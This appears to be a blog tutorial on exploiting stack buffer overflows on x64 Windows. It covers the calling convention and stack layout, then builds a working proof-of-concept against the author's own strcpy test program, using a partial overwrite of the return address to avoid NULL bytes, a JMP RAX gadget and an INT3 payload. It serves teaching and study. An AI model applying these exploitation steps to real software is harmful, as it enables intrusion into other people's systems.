Stack Based Buffer Overflows on x64 (Windows)

The previous two blog posts describe how a Stack Based Buffer Overflow vulnerability works on x86 (32-bit) Windows. The first part gives a short introduction to x86 Assembly and to how the stack works, and the second part explains the vulnerability and how to exploit it.

This article takes a similar approach to explain how the same vulnerability can be exploited on x64 (64-bit) Windows. The first part covers the differences in the Assembly code between x86 and x64 and the different function calling convention, and the second part details how these vulnerabilities can be exploited.

ASM for x64

There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.

First of all, the registers have changed:

  • The general purpose registers are now RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are 64 bits (8 bytes) wide instead of 32 bits (4 bytes).
  • EAX, EBX, ECX, EDX, ESI, EDI, EBP and ESP are the low 32 bits (the least significant 4 bytes) of those registers. Writing to one of them clears the upper 32 bits of the full register.
  • There are eight new 64-bit registers: R8, R9, R10, R11, R12, R13, R14 and R15.
  • R8D, R9D etc. give access to the low 32 bits of the new registers, just as EAX, EBX etc. do for the old ones.
  • Pushing and popping data on the stack moves 64 bits at a time instead of 32 bits.
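The relationship between a 64-bit register and its 32-bit view can be modelled in portable C. This is only a sketch: the helper names low32 and write32 are made up for illustration, and the real behaviour is defined by the CPU, not by C. The model encodes one detail worth remembering: on x64, writing a 32-bit register such as EAX clears the upper 32 bits of the full register.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: the 32-bit view (EAX, R8D, ...) of a 64-bit register. */
uint32_t low32(uint64_t reg)
{
    return (uint32_t)(reg & 0xFFFFFFFFu);
}

/* Hypothetical helper modelling "mov eax, value": the old upper half is lost. */
uint64_t write32(uint64_t old_reg, uint32_t value)
{
    (void)old_reg;          /* previous contents do not survive the write */
    return (uint64_t)value; /* zero-extended to 64 bits */
}

/* Usage example: call register_demo() from main(). */
void register_demo(void)
{
    uint64_t rax = 0x1122334455667788ULL;

    assert(low32(rax) == 0x55667788u); /* EAX is the low half of RAX */
    rax = write32(rax, 3);             /* like "mov eax,3" */
    assert(rax == 3);                  /* upper 32 bits are now zero */
}
```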

Calling convention

Another important difference is the way functions are called, the calling convention.

Here are the most important things we need to know:

  • The first 4 parameters are not placed on the stack. Integer and pointer parameters are passed in the RCX, RDX, R8 and R9 registers (floating-point parameters use XMM0 to XMM3).
  • If there are more than 4 parameters, the remaining ones are placed on the stack in right-to-left order, so the fifth parameter ends up at the lowest address, just above the shadow space.
  • Similar to x86, the return value will be available in the RAX register.
  • The caller allocates stack space for the arguments passed in registers (called “shadow space” or “home space”). Even though the parameters arrive in registers, the called function may need those registers for something else, and it then needs somewhere to save the parameter values: that place is the shadow space on the stack. The caller has to allocate this space before the call and deallocate it after the call. It must allocate at least 32 bytes (for the 4 registers), even if the function takes fewer than 4 parameters.
  • The stack has to be 16-byte aligned at the point of every call. The call instruction itself pushes the 8-byte return address, so on entry to a function RSP is 8 bytes past a 16-byte boundary. If that function then allocated only the 32 bytes of shadow space for its own calls, RSP would have moved by 8 + 32 = 40 bytes, which is not a multiple of 16. So it allocates 40 bytes instead: together with the 8-byte return address this makes 48 bytes, which is a multiple of 16.
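The shadow space and alignment rules can be turned into a small calculation. The sketch below is a simplified model, not what any particular compiler does: min_frame_size and stack_arg_offset are hypothetical names, and a real compiler is free to allocate more than this minimum.

```c
#include <assert.h>
#include <stddef.h>

#define SLOT         ((size_t)8)   /* one stack slot / register */
#define SHADOW_SLOTS ((size_t)4)   /* RCX, RDX, R8, R9 */
#define ALIGNMENT    ((size_t)16)

/* Hypothetical helper: smallest N for "sub rsp,N" in a function that needs
   local_bytes of locals and calls functions taking at most max_args
   arguments. */
size_t min_frame_size(size_t local_bytes, size_t max_args)
{
    size_t slots = max_args > SHADOW_SLOTS ? max_args : SHADOW_SLOTS;
    size_t n = local_bytes + slots * SLOT;

    /* On entry RSP is 8 bytes past a 16-byte boundary (the return address
       was just pushed), so N + 8 must be a multiple of 16. */
    while ((n + SLOT) % ALIGNMENT != 0)
        n++;
    return n;
}

/* Hypothetical helper: offset from RSP, at the moment of the call
   instruction, of a stack-passed argument (1-based index, 5 or higher). */
size_t stack_arg_offset(size_t arg_index)
{
    assert(arg_index >= 5);
    return (arg_index - 1) * SLOT; /* the first four slots are shadow space */
}

/* Usage example: call frame_demo() from main(). */
void frame_demo(void)
{
    assert(min_frame_size(0, 2) == 0x28);  /* 32 bytes shadow + 8 alignment */
    assert(stack_arg_offset(5) == 0x20);   /* fifth argument at [rsp+20] */
}
```

For a function with no locals that calls a two-argument function, the model gives 0x28 (40) bytes, matching the 32 + 8 arithmetic above.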

Function calling example

Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.

#include "stdafx.h"

int Add(long x, int y)
{
    int z = x + y;
    return z;
}

int main()
{
    Add(3, 4);
    return 0;
}

Here is a possible output, after removing all optimisations and security features.

Main function:

sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret

We can see the following:

  1. sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we previously discussed: 32 bytes for the register arguments and 8 bytes for alignment.
  2. mov edx,4 – Places the second parameter in the EDX register. The parameter is a 32-bit int, and a write to EDX clears the upper half of RDX anyway, so there is no need to use RDX.
  3. mov ecx,3 – The value of the first argument is placed in the ECX register.
  4. call <consolex64.Add> – Call the “Add” function.
  5. xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
  6. add rsp,28 – Clears the allocated stack space.
  7. ret – Return from main.

Add function:

mov dword ptr ss:[rsp+10],edx
mov dword ptr ss:[rsp+8],ecx
sub rsp,18
mov eax,dword ptr ss:[rsp+28]
mov ecx,dword ptr ss:[rsp+20]
add ecx,eax
mov eax,ecx
mov dword ptr ss:[rsp],eax
mov eax,dword ptr ss:[rsp]
add rsp,18
ret

Let’s see how this function works:

  1. mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in the ECX and EDX registers. But what if the function needs those registers for something else? (Note also that some registers must be preserved across a function call: RBX, RBP, RDI, RSI, RSP, R12, R13, R14 and R15.) In this case, the function uses the “shadow space” (“home space”) allocated by the caller. This instruction saves the second argument (the value 4) from the EDX register into the shadow space.
  2. mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one saves the first argument (value 3) from the ECX register on the stack.
  3. sub rsp,18 – Allocates 0x18 (24) bytes on the stack. This function does not call any other function, so it does not need to allocate 32 bytes of shadow space, and strictly speaking it is not required to keep the stack 16-byte aligned either. I am not sure why it allocates exactly 24 bytes. A plausible explanation is that the compiler rounds the local variable area up to 16 bytes and adds 8 bytes so that, together with the 8-byte return address, RSP is 16-byte aligned again (8 + 24 = 32).
  4. mov eax,dword ptr ss:[rsp+28] – Loads the second parameter (value 4) into the EAX register. RSP has moved down by 0x18, so rsp+28 is the same slot that was written as rsp+10 in step 1.
  5. mov ecx,dword ptr ss:[rsp+20] – Loads the first parameter (value 3) into the ECX register. This is the slot that was written as rsp+8 in step 2.
  6. add ecx,eax – Adds the value of the EAX register to ECX, so ECX becomes 7.
  7. mov eax,ecx – Copies the same value (the sum) into the EAX register.
  8. mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] – Store the sum in the local variable z and immediately load it back into EAX as the return value. This round trip is redundant and is a side effect of disabling optimisations.
  9. add rsp,18 – Cleanup the allocated stack space.
  10. ret – Return from the function.
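To check the offsets in the two listings, the instructions can be replayed on a toy stack. The sketch below is a hypothetical simulation written for this article: the array, the helper names and the starting value of RSP are all assumptions, and only the instruction sequence comes from the disassembly above.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

static unsigned char stack_mem[256]; /* toy stack, grows toward index 0 */

static void store32(size_t addr, uint32_t v)
{
    memcpy(&stack_mem[addr], &v, sizeof v);
}

static uint32_t load32(size_t addr)
{
    uint32_t v;
    memcpy(&v, &stack_mem[addr], sizeof v);
    return v;
}

/* Hypothetical simulation of main calling Add(x, y), one line per instruction. */
uint32_t simulate_add(uint32_t x, uint32_t y)
{
    size_t rsp = 136;           /* entry to main: 8 past a 16-byte boundary */
    uint32_t eax, ecx, edx;

    /* main */
    rsp -= 0x28;                /* sub rsp,28 */
    edx = y;                    /* mov edx,4 */
    ecx = x;                    /* mov ecx,3 */
    assert(rsp % 16 == 0);      /* aligned at the point of the call */
    rsp -= 8;                   /* call: pushes the return address */

    /* Add */
    store32(rsp + 0x10, edx);   /* mov dword ptr ss:[rsp+10],edx */
    store32(rsp + 0x08, ecx);   /* mov dword ptr ss:[rsp+8],ecx */
    rsp -= 0x18;                /* sub rsp,18 */
    eax = load32(rsp + 0x28);   /* mov eax,dword ptr ss:[rsp+28] */
    ecx = load32(rsp + 0x20);   /* mov ecx,dword ptr ss:[rsp+20] */
    ecx += eax;                 /* add ecx,eax */
    eax = ecx;                  /* mov eax,ecx */
    store32(rsp, eax);          /* mov dword ptr ss:[rsp],eax   (z = sum) */
    eax = load32(rsp);          /* mov eax,dword ptr ss:[rsp]   (return z) */
    rsp += 0x18;                /* add rsp,18 */
    rsp += 8;                   /* ret: pops the return address */

    /* back in main */
    rsp += 0x28;                /* add rsp,28 */
    assert(rsp == 136);         /* the stack is balanced again */
    return eax;
}
```

Calling simulate_add(3, 4) returns 7, which confirms that rsp+28 and rsp+20 after the sub refer to the slots written as rsp+10 and rsp+8 before it.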

Exploitation

Let’s see now how it would be possible to exploit a Stack Based Buffer Overflow on x64. The idea is similar to x86: we overwrite the stack until we overwrite the return address. At that point we can control program execution. This is the easiest example to understand this vulnerability.

We will have a simple program, such as this one:

void Copy(const char *p)
{
    char buffer[40];
    strcpy(buffer, p);
}

int main()
{
    Copy("Test");
    return 0;
}

We have a 40-byte buffer and a function that copies a string into that buffer.

This will be the assembly code of the main function:

sub rsp,28                       ; Allocate space on the stack
lea rcx,qword ptr ds:[1400021F0] ; Put in RCX the address of the string ("Test")
call <consolex64.Copy>           ; Call the Copy function
xor eax,eax                      ; EAX = 0, return value
add rsp,28                       ; Cleanup the stack space
ret                              ; return

And this will be the assembly code for the Copy function:

mov qword ptr ss:[rsp+8],rcx  ; Save the RCX on the stack
sub rsp,58                    ; Allocate space on the stack
mov rdx,qword ptr ss:[rsp+60] ; Put in RDX the "Test" string (second parameter to strcpy)
lea rcx,qword ptr ss:[rsp+20] ; Put in RCX the buffer (first parameter to strcpy)
call <consolex64.strcpy>      ; Call strcpy function
add rsp,58                    ; Cleanup the stack
ret                           ; Return from function

Let’s modify the Copy function call to the following:

Copy("1111111122222222333333334444444455555555");

The string has 40 characters, so it fills our buffer exactly. Please note that strcpy also places a NULL byte after the string, so this call already writes one byte past the end of the buffer, but this way it is easier to see the buffer on the stack.
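The off-by-one is easy to miss, so here is a minimal sketch of the check that strcpy does not perform. The function name fits_in_buffer is made up for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: does s, including its NULL terminator, fit in a
   buffer of buffer_size bytes? */
int fits_in_buffer(const char *s, size_t buffer_size)
{
    return strlen(s) + 1 <= buffer_size;
}

/* Usage example: call fits_demo() from main(). */
void fits_demo(void)
{
    assert(fits_in_buffer("Test", 40));
    /* 40 characters need 41 bytes, one more than the buffer has. */
    assert(!fits_in_buffer("1111111122222222333333334444444455555555", 40));
}
```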

This is what the stack looks like after the strcpy function call:

000000000012FE90 000007FEEE7E5D98 ; Shadow space for strcpy
000000000012FE98 00000001400021C8 ; Shadow space for strcpy
000000000012FEA0 0000000000000000 ; Shadow space for strcpy
000000000012FEA8 00000001400021C8 ; Shadow space for strcpy
000000000012FEB0 3131313131313131 ; "11111111"
000000000012FEB8 3232323232323232 ; "22222222"
000000000012FEC0 3333333333333333 ; "33333333"
000000000012FEC8 3434343434343434 ; "44444444"
000000000012FED0 3535353535353535 ; "55555555"
000000000012FED8 0000000000000000 ; Unused stack space (its first byte is the NULL terminator)
000000000012FEE0 00000001400021A0 ; Unused stack space
000000000012FEE8 0000000140001030 ; Return address

As you can see, we need 24 extra bytes to overwrite the return address: 16 bytes for the unused stack space and 8 bytes for the return address itself. Let’s modify the Copy function call to the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAAAAA");

This will overwrite the return address with “AAAAAAAA”.
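The distance between the buffer and the return address can be derived in two ways: from the Copy disassembly (sub rsp,58 and lea rcx,[rsp+20]) or from the addresses in the stack dump. The sketch below does both; the constant and function names are assumptions made for this example.

```c
#include <assert.h>
#include <stddef.h>

#define FRAME_SIZE    ((size_t)0x58) /* from "sub rsp,58" in Copy */
#define BUFFER_OFFSET ((size_t)0x20) /* from "lea rcx,[rsp+20]" */
#define RET_ADDR_SIZE ((size_t)8)

/* After "sub rsp,58" the return address sits at [rsp+58]. */
size_t offset_to_return_address(void)
{
    return FRAME_SIZE - BUFFER_OFFSET;
}

/* Number of characters needed to overwrite the whole return address. */
size_t full_overwrite_length(void)
{
    return offset_to_return_address() + RET_ADDR_SIZE;
}

/* Usage example: call offset_demo() from main(). */
void offset_demo(void)
{
    assert(offset_to_return_address() == 56); /* 40 buffer + 16 unused */
    assert(0x12FEE8 - 0x12FEB0 == 56);        /* same result from the dump */
    assert(full_overwrite_length() == 64);    /* length of the string above */
}
```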

NULL byte problem

In our case, the call to the “strcpy” function creates the vulnerability. It is important to understand that “strcpy” stops copying data when it encounters the first NULL byte. For us, this means that we cannot have NULL bytes inside our payload.

This is a problem for a simple reason: the addresses that we might use contain NULL bytes. For example, these are the addresses in my case:

0000000140001000 | 48 89 4C 24 08 | mov qword ptr ss:[rsp+8],rcx 
0000000140001005 | 48 83 EC 58    | sub rsp,58 
0000000140001009 | 48 8B 54 24 60 | mov rdx,qword ptr ss:[rsp+60] 
000000014000100E | 48 8D 4C 24 20 | lea rcx,qword ptr ss:[rsp+20] 
0000000140001013 | E8 04 0B 00 00 | call <consolex64.strcpy>
0000000140001018 | 48 83 C4 58    | add rsp,58 
000000014000101C | C3             | ret

If we would like to proceed like in the 32-bit example, we would have to overwrite the return address with an address such as 000000014000101C, where there would be a “JMP RSP” instruction, and continue with our shellcode after this address. As you can see, this is not possible: the address contains NULL bytes, so strcpy would stop copying before it reached the shellcode.
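To see how early strcpy would stop, we can count how many bytes of an address come before its first NULL byte, in the little-endian order in which they are stored in memory. This is a minimal sketch; bytes_before_null is a hypothetical helper name.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: number of bytes of addr, in little-endian order,
   that strcpy would copy before stopping at a zero byte (8 if none). */
unsigned bytes_before_null(uint64_t addr)
{
    unsigned i;

    for (i = 0; i < 8; i++) {
        if (((addr >> (8 * i)) & 0xFF) == 0)
            break;
    }
    return i;
}

/* Usage example: call null_demo() from main(). */
void null_demo(void)
{
    /* Stored as 1C 10 00 40 01 00 00 00: copying stops after two bytes. */
    assert(bytes_before_null(0x000000014000101CULL) == 2);
    /* "AAAAAAAA" has no NULL bytes at all. */
    assert(bytes_before_null(0x4141414141414141ULL) == 8);
}
```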

So, what can we do? We should find a workaround. A simple and useful trick is to partially overwrite the return address. x64 is little-endian, so the least significant bytes of the address are stored first, at the lowest addresses, and they are the first ones our string reaches. Instead of overwriting all 8 bytes of the address, we can overwrite only its lowest 4, 5 or 6 bytes and leave the upper bytes, which are already zero, untouched. Let’s modify the function call to overwrite only the lowest 5 bytes, so we just remove 3 “A”s from our payload. The function call will be the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAA");

Before the “RET” instruction, the stack will look like this:

000000000012FED8 3636363636363636 ; Part of our payload
000000000012FEE0 3737373737373737 ; Part of our payload
000000000012FEE8 0000004141414141 ; Return address

As you can see, we are able to specify a valid address, so we solved our first issue. However, we cannot add anything after it, because we need the NULL bytes to keep the address valid. So how can we exploit this vulnerability?
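The effect of a partial overwrite can be reproduced safely on a copy of the return address slot. The sketch below is a model, not the real stack: overwrite_return_address is a made-up name, and it only mimics what a strcpy-style copy does to the 8 bytes that hold the address, including the NULL terminator written after the copied characters.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: value of the return address after a strcpy-style
   copy of `tail` lands on the 8-byte slot that held `original`. */
uint64_t overwrite_return_address(uint64_t original, const char *tail)
{
    unsigned char slot[9];        /* 8 address bytes + room for the terminator */
    uint64_t result = 0;
    size_t n = strlen(tail);
    size_t i;

    if (n > 8)
        n = 8;                    /* only the first 8 bytes land in the slot */

    for (i = 0; i < 8; i++)       /* store little-endian, as x64 does */
        slot[i] = (unsigned char)(original >> (8 * i));
    slot[8] = 0;

    memcpy(slot, tail, n);        /* the copied characters */
    slot[n] = 0;                  /* the terminating NULL byte */

    for (i = 0; i < 8; i++)       /* read the slot back as an address */
        result |= (uint64_t)slot[i] << (8 * i);
    return result;
}

/* Usage example: call overwrite_demo() from main(). */
void overwrite_demo(void)
{
    /* Five "A"s: matches the stack dump above. */
    assert(overwrite_return_address(0x0000000140001030ULL, "AAAAA")
           == 0x0000004141414141ULL);
    /* Eight "A"s: the whole address is replaced. */
    assert(overwrite_return_address(0x0000000140001030ULL, "AAAAAAAA")
           == 0x4141414141414141ULL);
}
```

The upper bytes of the result are zero only because the upper bytes of the original return address were already zero and the terminator cleared the byte right after the copied characters.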

Let’s take a look at the registers, maybe we can find an easy win. Here are the registers before the RET instruction:

[Screenshot: Win64 registers]

We can see that in the RAX register we can find the address where our payload is stored. This happens for a simple reason: strcpy function will copy the string to the buffer and it will return the address of the buffer. As we already know, the returned data from a function call will be saved in RAX register, so we will have access to our payload using RAX register.
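That strcpy returns its destination pointer is part of the C standard library, and it is easy to confirm with a few lines of C. The function name below is made up for this check.

```c
#include <assert.h>
#include <string.h>

/* Returns 1 if strcpy handed back the address of the destination buffer. */
int strcpy_returns_destination(void)
{
    char buffer[40];
    char *result = strcpy(buffer, "Test"); /* fits: 5 bytes with terminator */

    return result == buffer;
}

/* Usage example: call strcpy_demo() from main(). */
void strcpy_demo(void)
{
    assert(strcpy_returns_destination());
}
```

Because Copy does nothing after strcpy returns, that pointer is still in RAX when the RET instruction runs.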

Now, our exploitation is simple:

  1. We have our payload address in RAX register
  2. We find a “JMP RAX” instruction
  3. We specify the address of that instruction as return address

We can easily find some “JMP RAX” instructions:

[Screenshot: JMP RAX]

We will take one of them, one whose address has no NULL bytes among its low 4 bytes, and we can create the payload:

  1. 56 bytes of shellcode (required to reach the return address). We will use 0xCC (the INT 3 instruction, which is used to pause the execution of the program in the debugger)
  2. 4 bytes of return address: the low 4 bytes, in little-endian order, of the address of the “JMP RAX” instruction that we previously found. The NULL terminator written by strcpy zeroes the fifth byte, and the upper three bytes of the original return address are already zero.

This is what the function call looks like:

 Copy("\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xF8\x0E\x7E\x77");

And we have control over the program.
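The same payload can be assembled in code instead of being typed by hand. The sketch below is an illustration under stated assumptions: build_payload is a hypothetical helper, the 56-byte offset comes from the Copy frame analysed earlier, and 0x777E0EF8 is simply the address from my machine, so it will differ on yours.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define OFFSET_TO_RET ((size_t)56) /* distance from buffer to return address */
#define ADDR_BYTES    ((size_t)4)  /* low bytes of the address we overwrite */

/* Hypothetical helper: writes 56 x 0xCC followed by the low 4 bytes of
   jmp_rax_addr (little-endian) and a terminator. Returns the payload
   length, or 0 if the address cannot be expressed this way. */
size_t build_payload(char *out, size_t out_size, uint64_t jmp_rax_addr)
{
    unsigned char *p = (unsigned char *)out;
    size_t i;

    if (out_size < OFFSET_TO_RET + ADDR_BYTES + 1)
        return 0;                 /* not enough room */
    if ((jmp_rax_addr >> 32) != 0)
        return 0;                 /* upper bytes must stay zero */

    memset(p, 0xCC, OFFSET_TO_RET);  /* INT 3 filler */
    for (i = 0; i < ADDR_BYTES; i++) {
        unsigned char b = (unsigned char)(jmp_rax_addr >> (8 * i));
        if (b == 0)
            return 0;             /* strcpy would stop here */
        p[OFFSET_TO_RET + i] = b;
    }
    p[OFFSET_TO_RET + ADDR_BYTES] = 0;
    return OFFSET_TO_RET + ADDR_BYTES;
}

/* Usage example: call payload_demo() from main(). */
void payload_demo(void)
{
    char buf[64];

    assert(build_payload(buf, sizeof buf, 0x777E0EF8ULL) == 60);
    assert((unsigned char)buf[0] == 0xCC);
    assert((unsigned char)buf[56] == 0xF8); /* lowest address byte first */
    assert((unsigned char)buf[59] == 0x77);
    assert(strlen(buf) == 60);
    /* An address with a NULL byte in its low 4 bytes is rejected. */
    assert(build_payload(buf, sizeof buf, 0x14000101CULL) == 0);
}
```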

Please note that we have a small buffer, and it might be difficult to find useful shellcode that fits in this space. The purpose of the article, however, was to show a way to exploit this vulnerability that is easy to understand.

Conclusion

Maybe this article did not cover a real-life situation, but it should be enough as a starting point in exploiting Stack Based Buffer Overflows on Windows 64 bits.

My recommendation is to compile yourself a program like this one and try to exploit it yourself. You can download my simple Visual Studio 2017 project from here.

If you have any questions, please leave a comment here or use the contact email.

2 thoughts on “Stack Based Buffer Overflows on x64 (Windows)”

  1. Lewis

    Nice article! I tried to replicate your example to understand the technique but unfortunately the shellcode is not being executed after RET.
    In x64Dbg I get “EXCEPTION_ACCESS_VIOLATION” at the first instruction of the shellcode. I am pretty sure that this happens because the stack page is marked as RW and is missing the Executable flag. Am I facing Executable space protection? How do I deal with that in this case?

    Thanks for your time, I really appreciate it.
